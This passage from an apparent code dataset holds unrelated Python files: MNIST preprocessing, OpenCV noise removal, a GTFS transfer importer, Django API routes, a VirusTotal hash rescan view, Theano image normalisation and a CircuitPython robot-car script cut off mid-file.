500)\n","sub_path":"PyQt/Test_Core_Qt_Win.py","file_name":"Test_Core_Qt_Win.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"45138802","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 23 15:48:01 2018\n\n@author: bebxadvaboy\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport os\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\n\ndef get_MNIST_data():\n    \n    data = pd.read_csv(os.path.join(\"data\",\"train.csv\"))\n    X_train = data.iloc[:,1:].values.astype('float32')  # all pixel values (.iloc replaces the removed .ix indexer)\n    #X_train = X_train.reshape((X_train.shape[0], 28, 28))\n    y_train = data.iloc[:,0].values.astype('int32')  # only the labels, i.e. the target digits\n#    b = np.zeros((X_train.shape[0],10))\n#    b[np.arange(X_train.shape[0]), y_train] = 1\n    X_train, X_val, Y_train, Y_val = train_test_split(X_train, y_train, test_size=0.1, random_state=42)\n    X_train = X_train/255.0\n    X_val = X_val/255.0\n    Y_train = np.array([Y_train])\n    Y_val = np.array([Y_val])\n    train = pd.DataFrame(np.concatenate((Y_train.T, X_train), axis=1))\n    test = pd.DataFrame(np.concatenate((Y_val.T, X_val), axis=1))\n    test.to_csv('test.csv', index=False)\n    train.to_csv('train.csv', index=False)\n\n\ndef reset_graph():\n    \n    if 'sess' in globals() and sess:\n        sess.close()\n    \n    tf.reset_default_graph()","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"292656718","text":"# Import required libraries and modules\nimport cv2\nimport numpy as np\nfrom datetime import datetime\n\n\ndef removeLine(img):\n    '''\n    This function takes an image (numpy array) as its argument.\n\n    The Hough line transform is a technique to detect lines\n    (even if shortly broken) in computer vision.\n\n    It detects lines, removes them (here by painting them white)\n    and returns the processed image.\n    '''\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)  # Convert image into grayscale\n\n    # These two calls detect edges, then straight lines, in the image\n    edges = cv2.Canny(gray, 50, 150, apertureSize=3)\n    lines = cv2.HoughLines(edges, 1, np.pi/180, 50)\n\n    if lines is None:  # HoughLines returns None when no line is found\n        return img\n\n    for line in lines:\n        for r, theta in line:\n\n            a = np.cos(theta)\n            b = np.sin(theta)\n\n            x0 = a*r\n\n            # y0 stores the value rsin(theta)\n            y0 = b*r\n\n            # x1 stores the rounded off value of (rcos(theta)-1000sin(theta))\n            x1 = int(x0 + 1000*(-b))\n\n            # y1 stores the rounded off value of (rsin(theta)+1000cos(theta))\n            y1 = int(y0 + 1000*(a))\n\n            # x2 stores the rounded off value of (rcos(theta)+1000sin(theta))\n            x2 = int(x0 - 1000*(-b))\n\n            # y2 stores the rounded off value of (rsin(theta)-1000cos(theta))\n            y2 = int(y0 - 1000*(a))\n\n            # keep only near-vertical and near-horizontal lines\n            if (theta < 0.05 and theta > -0.05) or (theta > 1.56 and theta < 1.58):\n                cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 5)\n\n    return img\n\n\ndef removeBox(img):\n    '''\n    This function takes an image (numpy array) as its argument.\n\n    Contour finding is used to detect contours (rectangular boxes)\n    in the image. Its time complexity is lower than the Hough line\n    transform's.\n\n    It detects all rectangles and whites them out.\n    '''\n    # the BLUR and MASK_* constants are kept from the original but unused here\n    BLUR = 21\n    CANNY_THRESH_1 = 10\n    CANNY_THRESH_2 = 200\n    MASK_DILATE_ITER = 10\n    MASK_ERODE_ITER = 10\n    MASK_COLOR = (0.0,0.0,0.0)  # In BGR format\n\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)  # Convert image into grayscale\n\n    edges = cv2.Canny(gray, CANNY_THRESH_1, CANNY_THRESH_2)\n    edges = cv2.dilate(edges, None)\n    edges = cv2.erode(edges, None)\n\n    # Detect contours using the findContours method\n    contour_info = []\n    contours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n    for c in contours:\n        contour_info.append((c, cv2.isContourConvex(c), cv2.contourArea(c),))\n    contour_info = sorted(contour_info, key=lambda c: c[2], reverse=True)\n\n    # contours are sorted by area, so stop at the first one below the threshold\n    for i in contour_info:\n        (x, y, w, h) = cv2.boundingRect(i[0])\n        if i[2] < 2500:\n            break\n        cv2.rectangle(img, (x, y), (x+w, y+h), (255, 255, 255), 5)  # white out each detected rectangle\n\n    return img\n","sub_path":"VisionAPI/VisionModule/removeNoise.py","file_name":"removeNoise.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"44961170","text":"# Write a Python program to accept a filename from the user and print its extension.
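\n# NOTE (added): os.path.splitext keeps the leading dot, so the script below prints '.java' rather than 'java' for the sample input.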
\n# Sample filename : abc.java\n# Output : java\n\nimport os\n\nfilen = input(\"Enter a file name: \")\nfilename, file_extension = os.path.splitext(filen)\n\nprint(file_extension)\n\n","sub_path":"basics/ex_007.py","file_name":"ex_007.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"131481463","text":"# -*- coding: iso-8859-15 -*-\n'''\nVISUM add-in Import Google Transit Feed\n\nDate: 22.05.2014\nAuthor: Dimitri Krutik\nContact: Dimitri.Krutik@ptvgroup.com\nCompany: PTV AG'''\n\nimport GoogleTransitImport.Operations as op\nfrom GoogleTransitImport import GoogleTransitExceptions as ex\nfrom GoogleTransitImport.TransitDataImporter.DataConverter.ConverterBase import ConverterBase\n\n\nclass TransfersConverter(ConverterBase):\n \"\"\"\n Parse \"transfers.txt\".\n \"\"\"\n tSysCode_Walk = \"F\"\n\n def __init__(self):\n super(TransfersConverter, self).__init__()\n self.__stopsData = None\n self.__hasTransferBetweenStops = False\n\n def _initializeDataForExecution(self, worker):\n super(TransfersConverter, self)._initializeDataForExecution(worker)\n self.__stopsData = self._worker.Storage.get(\"StopsData\")\n\n def _resetLocalData(self):\n super(TransfersConverter, self)._resetLocalData()\n self.__stopsData = None\n self.__hasTransferBetweenStops = False\n\n def _startConversion(self):\n if self._worker.Files.transfersfile == None:\n return\n\n self.__parseTransfersFile()\n\n if self.__hasTransferBetweenStops:\n mess0 = _(\"Some transfer times between stops areas could not be imported, because the stop areas are associated with different stops.\").decode('iso-8859-15')\n mess1 = _(\"The transfer times between those stop areas will be calculated from 'PuTWalk'.\").decode('iso-8859-15')\n mess2 = _(\"See file '%s'.\").decode('iso-8859-15') % self._worker.Files.TransfersFileName\n mess = \"%s %s %s\" % (mess0, mess1, mess2)\n self._worker.WriteWarning(mess)\n\n\n def __parseTransfersFile(self):\n\n with self._worker.OpenCSVFile(self._worker.Files.transfersfile) as csvReader:\n try:\n self._setReadFileProgressDlg(csvReader)\n self._progressDlg.Message = _(\"Processing transfers\")\n\n if self.__containsTransferTimes(csvReader):\n self.__parseTransfers(csvReader)\n\n except ex.ExecutionCanceled:\n raise\n\n except Exception as e:\n mess = self._createDefaultReadFileExceptionMessage(self._worker.Files.TransfersFileName)\n raise ex.GoogleTransitException(mess, e)\n\n finally:\n self._resetReadFileProgressDlg()\n\n @classmethod\n def __containsTransferTimes(cls, csvReader):\n \"\"\"\n Check if \"min transfer time\" attribute is defined in the file.\n \"\"\"\n try:\n csvReader.fieldnames.index(\"min_transfer_time\")\n return True\n except Exception:\n return False\n\n def __parseTransfers(self, csvReader):\n for tranferRecord in csvReader:\n self._progressDlg.UpdateProgressDialog()\n self._progressDlg.LineCount += 1\n\n transfer = self.__parseTransferRecord(tranferRecord)\n\n if self.__canSetTransferTime(transfer):\n self.__setTransferTime(transfer)\n\n def __canSetTransferTime(self, transfer):\n \"\"\"\n Check, if the transfer time can be set:\n only if the time value is available and the stops are in the same station.\n The transfer time between two single stops can not be set in Visum.\n In Visum the transfer time between stops is a calculated value.\n \"\"\"\n if not transfer.hasTransferTime():\n return False\n\n if transfer.fromStopId != transfer.toStopId:\n if not 
self.__stopsData.isTheSameStation(transfer.fromStopId, transfer.toStopId):\n self.__hasTransferBetweenStops = True\n return False\n\n return True\n\n def __parseTransferRecord(self, tranferReader):\n transfer = Transfer()\n transfer.fromStopId = op.MakeSafeString(self._readRequiredAttribute(tranferReader, \"from_stop_id\"))\n transfer.toStopId = op.MakeSafeString(self._readRequiredAttribute(tranferReader, \"to_stop_id\"))\n\n minTransferTime = self._readAttribute(tranferReader, \"min_transfer_time\")\n transfer.timeSec = self.__getTransferTimeEntry(minTransferTime)\n return transfer\n\n def __setTransferTime(self, transfer):\n fromStopAreas = self.__stopsData.getStopAreas(transfer.fromStopId)\n\n if transfer.fromStopId == transfer.toStopId:\n toStopAreas = fromStopAreas\n else:\n toStopAreas = self.__stopsData.getStopAreas(transfer.toStopId)\n\n for fromArea in fromStopAreas:\n for toArea in toStopAreas:\n self.__createTransferWalkTime(fromArea, toArea, transfer.timeSec)\n\n\n def __createTransferWalkTime(self, fromArea, toArea, timeSec):\n transfer = self._netObjectFactory.CreateTransferWalkTimeStopArea(fromStopArea = fromArea,\n toStopArea = toArea,\n tsysCode = self.tSysCode_Walk,\n time = timeSec)\n self._visumTables.AddTransferWalkTimeStopAreaEntry(transfer)\n\n @classmethod\n def __getTransferTimeEntry(cls, minTransferTimeVal):\n \"\"\"\n Create the transfer time entry for Visum.\n Format: \"180s\"\n minTransferTimeVal - transfer time in seconds.\n \"\"\"\n if minTransferTimeVal:\n try:\n return \"%ss\" % int(minTransferTimeVal)\n except Exception:\n pass\n\n return None\n\n\nclass Transfer(object):\n\n __slots__ = (\"fromStopId\", \"toStopId\", \"timeSec\")\n\n def __init__(self):\n self.fromStopId = \"\"\n self.toStopId = \"\"\n self.timeSec = None\n\n def hasTransferTime(self):\n return self.timeSec != None\n","sub_path":"GoogleTransitImport/TransitDataImporter/DataConverter/TransfersConverter.py","file_name":"TransfersConverter.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"184678658","text":"\ndef Range(start=None,stop=None,step=1) :\n if start is None :\n return 0\n if stop is None :\n stop = start\n start = 0\n if type(start) is not int or type(stop) is not int or type(step) is not int :\n print(\"Argument type error\")\n return 0\n a=[]\n if step > 0 :\n while stop > start :\n a.append(start)\n start += step\n elif step < 0 :\n while stop < start :\n a.append(start)\n start += step\n return a\n\n","sub_path":"Practice/o.dagestanski/Test_work8/t3.py","file_name":"t3.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"488276172","text":"class Solution:\n def groupAnagrams(self, strs):\n ans = collections.defaultdict(list)\n for s in strs:\n count = [0] * 26\n for c in s:\n count[ord(c) - ord('a')] += 1\n ans[tuple(count)].append(s)\n return ans.values()\n\n\nclass Solution1:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n res = []\n l = dict()\n for i in range(len(strs)):\n item = strs[i]\n sorted_characters = sorted(item)\n item = \"\".join(sorted_characters)\n if item in l:\n l[item].append(strs[i])\n else:\n l[item] = [strs[i]]\n for item in l:\n res.append(l[item])\n return 
res\n","sub_path":"map/49_group_anagram.py","file_name":"49_group_anagram.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"53555767","text":"\"\"\"\n4 4 1 1\n1 2\n1 3\n2 3\n2 4\n\"\"\"\n\nfrom collections import deque\n\nN, M, K, X = map(int, input().split())\n\n# adjacency list\ncities = [[] for _ in range(N + 1)]\n\nfor _ in range(M):\n    city1, city2 = map(int, input().split())\n    cities[city1].append(city2)\n\n# shortest path length per city\nnum_of_paths = [-1] * (N + 1)\n# initialize the start city to 0\nnum_of_paths[X] = 0\n\n\ndef bfs():\n    queue = deque([X])\n    while queue:\n        cur_city = queue.popleft()\n        for city in cities[cur_city]:\n            # -1 means the city has not been visited yet\n            if num_of_paths[city] == -1:\n                # one step further than the current city\n                num_of_paths[city] = (num_of_paths[cur_city] + 1)\n                queue.append(city)\n\n\nbfs()\n\nresult = []\n\n# collect the cities whose path length is exactly K\nfor index, path in enumerate(num_of_paths):\n    if path == K:\n        result.append(index)\n\n# print -1 when no such city exists\nif not len(result):\n    result.append(-1)\n\nfor c in result:\n    print(c)\n","sub_path":"광훈/PART03/DFS&BFS/15_특정_거리의_도시_찾기.py","file_name":"15_특정_거리의_도시_찾기.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"262455011","text":"from django.urls import path, include\nfrom rest_framework import routers\n\nfrom . import views\n\napp_name = 'api'\n\nrouter = routers.DefaultRouter()\nrouter.register(r'assemblies', views.AssemblyList)\nrouter.register(r'motions', views.MotionList)\nrouter.register(r'amendments', views.AmendmentList)\n\n\nurlpatterns = [\n    path('', include(router.urls)),\n    # ex: api/anon-token\n    path('anon-token/', views.token),\n    # ex: api/signup\n    path('signup/', views.signup),\n    # ex: api/login\n    path('login/', views.login_student),\n    # ex: api/logout\n    path('logout/', views.logout_student),\n    # ex: /api/assemblies/1\n    path('assemblies/<int:pk>/', views.AssemblyDetail.as_view()),\n    # ex: /api/motions/1\n    path('motions/<int:pk>/', views.MotionDetail.as_view()),\n    # ex: /api/motions/1/vote\n    path('motions/<int:pk>/vote', views.MotionDetailVote),\n    # ex: /api/amendments/1\n    path('amendments/<int:pk>/', views.AmendmentDetail.as_view()),\n    # ex: /api/amendments/1/vote\n    path('amendments/<int:pk>/vote', views.AmendmentDetailVote),\n\n]","sub_path":"scannvote/apis/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"5865845","text":"import logging\nimport random\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig()\nlogger.setLevel(logging.INFO)\n\nfrom django.core.management.base import BaseCommand\nfrom django.core.management import setup_environ\nfrom leestbot import settings\nsetup_environ(settings)\n\nfrom leestSniffer import models\nfrom twitter_api import api\n\napp = api.app_get_twitter_accounts\n\n\nclass Command(BaseCommand):\n    \"\"\" Fetch the Twitter friends of a randomly chosen stored Tweeter. 
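Invoked as ./manage.py get_twitter_accounts (the filename under management/commands supplies the command name). 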
\"\"\"\n\n def handle(self, **options):\n \"\"\" The handle is called when ./manage.py notification is ran.\n\n Command to add to cronjob:\n @daily /usr/bin/eval PYTHONPATH=/home/leestbot/modules python /home/leestbot/leestbot/manage.py notification >>/home/leestbot/cronrun 2>&1\n \"\"\"\n logger.info('**'*20)\n logger.info('Running {0}.'.format(__file__))\n\n count = models.Tweeter.objects.count()\n\n if count:\n # getting a random user.\n #\n tweeter = models.Tweeter.objects.all()[\n random.randrange(1, count)\n ]\n logger.info('Getting friends of {0}.'.format(tweeter.slug))\n tweeter.app = app\n tweeter.get_friends(100)\n\n else:\n logger.warning('No Tweeter account found!')\n\n","sub_path":"leestSniffer/management/commands/get_twitter_accounts.py","file_name":"get_twitter_accounts.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"581087904","text":"from __future__ import print_function, division\n\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nimport skimage as ski\nimport skimage.morphology as morp\n\nimport pickle\nimport functools\nimport operator\nimport pandas as pd\nimport theano\nimport theano.tensor as T\nfrom theano.tensor.nnet import conv\nfrom sklearn.metrics import confusion_matrix\n\ndef img_show(img, title=None, margin=0.05, dpi=400, cmap = 'gray'):\n nda = img\n spacing = [1 ,1, 1]\n\n figsize = (1 + margin) * nda.shape[0] / dpi, (1 + margin) * nda.shape[1] / dpi\n extent = (0, nda.shape[1]*spacing[1], nda.shape[0]*spacing[0], 0)\n\n fig = plt.figure(figsize=figsize, dpi=dpi)\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n plt.set_cmap(cmap)\n ax.imshow(nda, extent=extent, interpolation=None)\n if title:\n plt.title('%s' % (title))\n return ax\n\ndef img_show_with_rect(img, rect =[10,10,20,20], ax = None, title=None, margin=0.05, dpi=400):\n import matplotlib.patches as patches\n if ax == None:\n ax = img_show(img, title=None, margin=0.05, dpi=dpi)\n\n ax.add_patch(\n patches.Rectangle(\n (rect[0], rect[1]), # (x,y)\n rect[2], # width\n rect[3], # height\n edgecolor = 'r',\n fill=False\n )\n )\n return ax\n\ndef findROI(img):\n img2 = ski.color.rgb2hsv(img)\n msk0v = ski.filters.threshold_otsu(img2[:,:,0])\n msk1v = ski.filters.threshold_otsu(img2[:,:,1])\n\n msk0 = img2[:,:,0] > msk0v\n msk1 = img2[:,:,1] > msk1v\n\n msk0 = morp.remove_small_objects(msk0, min_size=36)\n msk1 = morp.remove_small_objects(msk1, min_size=36)\n\n msk3 = np.logical_and(msk0, msk1)\n disk = morp.disk(20)\n msk3 = morp.binary_dilation(msk3, disk)\n\n msk = ski.img_as_int(msk3)\n return msk\n\ndef addMask(img, msk, color):\n cts = ski.measure.find_contours(msk, 0)\n for ct in cts:\n ct = ct[:, [1, 0]]\n pts = ct.astype(np.int32).reshape(-1, 1, 2)\n cv2.polylines(img, [pts], True, color, 5)\n return img\n\ndef addMaskOverlay(img, msk, color):\n# msk = msk.astype(np.uint8)\n alpha = 0.7\n# msk_jet = cv2.applyColorMap(msk, cv2.COLORMAP_JET)\n img_overlay = cv2.addWeighted(img, alpha, msk, 1 - alpha, 1);\n return img_overlay\n\n# msktype is 0 if it's a simple addition\n# msktype is 1 if it's an overlay\ndef doAddMask(imgName, mskName, color, outputName, msktype = 0):\n img = cv2.imread(imgName)\n if msktype == 0:\n msk = ski.io.imread(mskName, True) > 0\n img = addMask(img, msk, color)\n elif msktype == 1:\n msk = cv2.imread(mskName)\n img = addMaskOverlay(img, msk, color)\n cv2.imwrite(outputName, img)\n\ndef doAddMasks(imgName, mskName_list, color_list, 
outputName):\n img = cv2.imread(imgName)\n for mskName, color in zip(mskName_list, color_list):\n msk = ski.io.imread(mskName, True) > 0\n img = addMask(img, msk, color)\n cv2.imwrite(outputName, img)\n\ndef gaussian_filter(kernel_shape):\n x = np.zeros((kernel_shape, kernel_shape), dtype=theano.config.floatX)\n\n def gauss(x, y, sigma=2.0):\n Z = 2 * np.pi * sigma**2\n return 1./Z * np.exp(-(x**2 + y**2) / (2. * sigma**2))\n\n for i in xrange(kernel_shape):\n for j in xrange(kernel_shape):\n x[i,j] = gauss(i-4., j-4.)\n\n return x / np.sum(x)\n\n\ndef lecun_lcn(input, img_shape, kernel_shape, threshold=1e-4):\n \"\"\"\n Yann LeCun's local contrast normalization\n This is performed per-colorchannel!!!\n\n http://yann.lecun.com/exdb/publis/pdf/jarrett-iccv-09.pdf\n \"\"\"\n input = input.reshape((input.shape[0], 1, input.shape[1], input.shape[2]))\n X = T.matrix(dtype=input.dtype)\n X = X.reshape((len(input), 1, img_shape[0], img_shape[1]))\n\n filter_shape = (1, 1, kernel_shape, kernel_shape)\n filters = theano.shared(gaussian_filter(kernel_shape).reshape(filter_shape))\n\n convout = conv.conv2d(input=X,\n filters=filters,\n image_shape=(input.shape[0], 1, img_shape[0], img_shape[1]),\n filter_shape=filter_shape,\n border_mode='full')\n\n # For each pixel, remove mean of 9x9 neighborhood\n mid = int(np.floor(kernel_shape / 2.))\n centered_X = X - convout[:, :, mid:-mid, mid:-mid]\n\n # Scale down norm of 9x9 patch if norm is bigger than 1\n sum_sqr_XX = conv.conv2d(input=T.sqr(X),\n filters=filters,\n image_shape=(input.shape[0], 1, img_shape[0], img_shape[1]),\n filter_shape=filter_shape,\n border_mode='full')\n\n denom = T.sqrt(sum_sqr_XX[:, :, mid:-mid, mid:-mid])\n per_img_mean = T.mean(denom, axis=(1, 2))\n divisor = T.largest(per_img_mean.dimshuffle(0, 1, 'x', 'x'), denom)\n divisor = T.maximum(divisor, threshold)\n\n new_X = centered_X / divisor\n #new_X = theano.tensor.flatten(new_X, outdim=3)\n\n f = theano.function([X], new_X)\n return f(input)\n\n\ndef lcn_image(images, kernel_size=9):\n \"\"\"\n This assumes image is 01c and the output will be c01 (compatible with conv2d)\n\n :param image:\n :param inplace:\n :return:\n \"\"\"\n image_shape = (images.shape[1], images.shape[2])\n if len(images.shape) == 3:\n # this is greyscale images\n output = lecun_lcn(images, image_shape, kernel_size)\n else:\n # color image, assume RGB\n r = images[:, :, :, 0]\n g = images[:, :, :, 1]\n b = images[:, :, :, 2]\n\n output = np.concatenate((\n lecun_lcn(r, image_shape, kernel_size),\n lecun_lcn(g, image_shape, kernel_size),\n lecun_lcn(b, image_shape, kernel_size)),\n axis=1\n )\n return output\n\n\ndef global_contrast_normalize(X, scale=1., subtract_mean=True, use_std=False,\n sqrt_bias=0., min_divisor=1e-8):\n \"\"\" Code adopted from here: https://github.com/lisa-lab/pylearn2/blob/master/pylearn2/expr/preprocessing.py\n but can work with b01c and bc01 orderings\n\n An Analysis of Single-Layer\n Networks in Unsupervised Feature Learning\". AISTATS 14, 2011.\n http://www.stanford.edu/~acoates/papers/coatesleeng_aistats_2011.pdf\n \"\"\"\n assert X.ndim > 2, \"X.ndim must be more than 2\"\n scale = float(scale)\n assert scale >= min_divisor\n\n # Note: this is per-example mean across pixels, not the\n # per-pixel mean across examples. 
So it is perfectly fine\n # to subtract this without worrying about whether the current\n # object is the train, valid, or test set.\n aggr_axis = tuple(np.arange(len(X.shape) - 1) + 1)\n mean = np.mean(X, axis=aggr_axis, keepdims=True)\n if subtract_mean:\n X = X - mean[:, np.newaxis] # Makes a copy.\n else:\n X = X.copy()\n\n if use_std:\n # ddof=1 simulates MATLAB's var() behaviour, which is what Adam\n # Coates' code does.\n ddof = 1\n\n # If we don't do this, X.var will return nan.\n if X.shape[1] == 1:\n ddof = 0\n\n normalizers = np.sqrt(sqrt_bias + np.var(X, axis=aggr_axis, ddof=ddof, keepdims=True)) / scale\n else:\n normalizers = np.sqrt(sqrt_bias + np.sum((X ** 2), axis=aggr_axis, keepdims=True)) / scale\n\n # Don't normalize by anything too small.\n normalizers[normalizers < min_divisor] = 1.\n X /= normalizers[:, np.newaxis] # Does not make a copy.\n return X\n","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":7453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"218440106","text":"'''\nneed to wait at least 15 minutes to get the lastest results\n\nwebsite needed:\n https://www.virustotal.com/#/home/upload\n using a Publiv API of virustotal\n The Public API is limited to 4 requests per minute.\n The Public API must not be used in commercial products or services.\n Have an addition limit of daily and monthly limits. (Please refer to the site to find out more)\n'''\nfrom django.shortcuts import render\nfrom django.core.files.storage import FileSystemStorage\nfrom . import settings\n\nimport json\nimport requests\nimport sys\nimport time\nimport webbrowser\n\nimport os\n\ndef debug(string):\n debug_mode = True\n if(debug_mode):\n print(string)\n\ndef button(request):\n return render(request, 'home.html')\n\ndef rescanHashVirustotal(fromI, apikey, f1, hashArray):\n\n for x in range(fromI, fromI + 4):\n url = 'https://www.virustotal.com/vtapi/v2/file/rescan'\n try:\n params = {'apikey': apikey,\n 'resource': f1[x]}\n r = requests.post(url, params=params, verify=True)\n print(x)\n\n toStore = r.content\n # print(toPrint)\n\n json_data = json.loads(toStore)\n scanId = json_data['scan_id']\n print(scanId)\n hashArray.append(scanId)\n except:\n hashArray.append('empty')\n return hashArray\n\ndef hashSend(request):\n hashArray = []\n f1 = []\n toWait = 0\n timestr = time.strftime(\"%d%m%y-%H.%M.%S\")\n timestrtxt = \" \" + timestr + \".txt\"\n VTkey1 = settings.VT_KEY_1\n VTkey2 = settings.VT_KEY_2\n data = []\n try:\n debug(\"what am i \")\n temp_file = request.FILES['send']\n fs = FileSystemStorage()\n fsName = fs.save(temp_file.name, temp_file)\n urlFile = open(\"media/\" + fsName, 'r') #urlFile = open(r'C:\\Users\\SP-F1\\Desktop\\scripting\\Python script\\urlScript\\url.txt', 'r')#Open file as written in the path, and save each line into the array 'f1'\n f1 = urlFile.readlines()\n size = len(f1) # The number of lines.\n\n hashArray = rescanHashVirustotal(0, VTkey1, f1, hashArray)\n hashArray = rescanHashVirustotal(4, VTkey2, f1, hashArray)\n\n for lines in hashArray:\n debug(lines)\n\n data.append(\"Please come back in 1 hours time.\")\n urlFile.close()\n except:\n data.append(\"Error in sending hash file to virustotal\")\n return render(request, 'home.html', {'hashFeedback': data})","sub_path":"validator/hash_send.py","file_name":"hash_send.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} 
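The hash_send.py sample above quotes VirusTotal's Public API limit of 4 requests per minute, but rescanHashVirustotal fires its POSTs back-to-back and only stays under quota by splitting the hashes across two API keys. A minimal client-side throttle could look like the sketch below; the RateLimiter class and its wait() method are illustrative names, not part of the sample:

import time

class RateLimiter:
    # Allow at most `calls` requests per sliding window of `period` seconds (illustrative).
    def __init__(self, calls=4, period=60.0):
        self.calls, self.period, self.stamps = calls, period, []

    def wait(self):
        now = time.monotonic()
        # Keep only the timestamps that are still inside the window.
        self.stamps = [t for t in self.stamps if now - t < self.period]
        if len(self.stamps) >= self.calls:
            # Sleep until the oldest call in the window expires.
            time.sleep(self.period - (now - self.stamps[0]))
        self.stamps.append(time.monotonic())

Calling limiter.wait() right before each requests.post(url, params=params) would keep a single key under the documented quota, instead of relying on the bare except blocks to swallow rate-limit failures.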
+{"seq_id":"564166585","text":"# car5 but with a class\nimport time, board, pulseio, busio, adafruit_gps, adafruit_lsm9ds1, hcsr04_lib\nfrom adafruit_motor import servo\nimport math as m\n\n# tweak parameters\nrefreshRate = 0.1\nlostSignalTimer = 5.0\nsonarSensitivityFront = 50.0 # obstacle distance in cm before avoiding\ndefaultMoveSpeed = 0.7\ndefaultTurnSpeed = 0.5\n\n# -------- set up ultrasonic sensor -----------\ntrig1 = board.D\necho1 = board.D60\nsonar_front = hcsr04_lib.HCSR04(trig1, echo1)\n\n\n# -------- set up servos -----------\n# create a PWMOut object on the control pin.\npwm1 = pulseio.PWMOut(board.D31, duty_cycle=0, frequency=50)\npwm2 = pulseio.PWMOut(board.D36, duty_cycle=0, frequency=50)\n\n# pulse widths exercise the full range of the 169 servo, other servos are different\nservo1 = servo.ContinuousServo(pwm1, min_pulse=500, max_pulse=2500)\nservo2 = servo.ContinuousServo(pwm2, min_pulse=500, max_pulse=2500)\n\n# -------- set up GPS -----------\n# Define RX and TX pins for the board's serial port connected to the GPS.\n# These are the defaults you should use for the GPS FeatherWing.\n# For other boards set RX = GPS module TX, and TX = GPS module RX pins.\nRX = board.RX1\nTX = board.TX1\n\n\n# Create a serial connection for the GPS connection using default speed and\n# a slightly higher timeout (GPS modules typically update once a second).\nuart = busio.UART(TX, RX, baudrate=9600, timeout=30)\n\n# for a computer, use the pyserial library for uart access\n#import serial\n#uart = serial.Serial(\"/dev/ttyUSB0\", baudrate=9600, timeout=3000)\n\n# Create a GPS module instance.\ngps = adafruit_gps.GPS(uart, debug=False)\n\n# Initialize the GPS module by changing what data it sends and at what rate.\n# These are NMEA extensions for PMTK_314_SET_NMEA_OUTPUT and\n# PMTK_220_SET_NMEA_UPDATERATE but you can send anything from here to adjust\n# the GPS module behavior:\n# https://cdn-shop.adafruit.com/datasheets/PMTK_A11.pdf\n\n# Turn on the basic GGA and RMC info (what you typically want)\ngps.send_command(b'PMTK314,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0')\n# Turn on just minimum info (RMC only, location):\n#gps.send_command(b'PMTK314,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0')\n# Turn off everything:\n#gps.send_command(b'PMTK314,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0')\n# Tuen on everything (not all of it is parsed!)\n#gps.send_command(b'PMTK314,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0')\n\n# Set update rate to once a second (1hz) which is what you typically want.\ngps.send_command(b'PMTK220,1000')\n# Or decrease to once every two seconds by doubling the millisecond value.\n# Be sure to also increase your UART timeout above!\n#gps.send_command(b'PMTK220,2000')\n# You can also speed up the rate, but don't go too fast or else you can lose\n# data during parsing. This would be twice a second (2hz, 500ms delay):\n#gps.send_command(b'PMTK220,500')\n\n# initialize gps to give it time to get the correct current coordinates\n\n\n# Main loop runs forever printing the location, etc. 
every second.\n\n# ---------------- copied ------------------\n# startTime = time.monotonic()\n# last_print = time.monotonic()\n# while last_print - startTime < 3.0:\n# # Make sure to call gps.update() every loop iteration and at least twice\n# # as fast as data comes from the GPS unit (usually every second).\n# # This returns a bool that's true if it parsed new data (you can ignore it\n# # though if you don't care and instead look at the has_fix property).\n# gps.update()\n# # Every second print out current location details if there's a fix.\n# current = time.monotonic()\n# if current - last_print >= 0.1:\n# print(\"Setting up...\")\n# last_print = current\n# if not gps.has_fix:\n# # Try again if we don't have a fix yet.\n# print('Waiting for fix...')\n# continue\n# # We have a fix! (gps.has_fix is true)\n# # Print out details about the fix like location, date, etc.\n# print('=' * 40) # Print a separator line.\n# print('Fix timestamp: {}/{}/{} {:02}:{:02}:{:02}'.format(\n# gps.timestamp_utc.tm_mon, # Grab parts of the time from the\n# gps.timestamp_utc.tm_mday, # struct_time object that holds\n# gps.timestamp_utc.tm_year, # the fix time. Note you might\n# gps.timestamp_utc.tm_hour, # not get all data like year, day,\n# gps.timestamp_utc.tm_min, # month!\n# 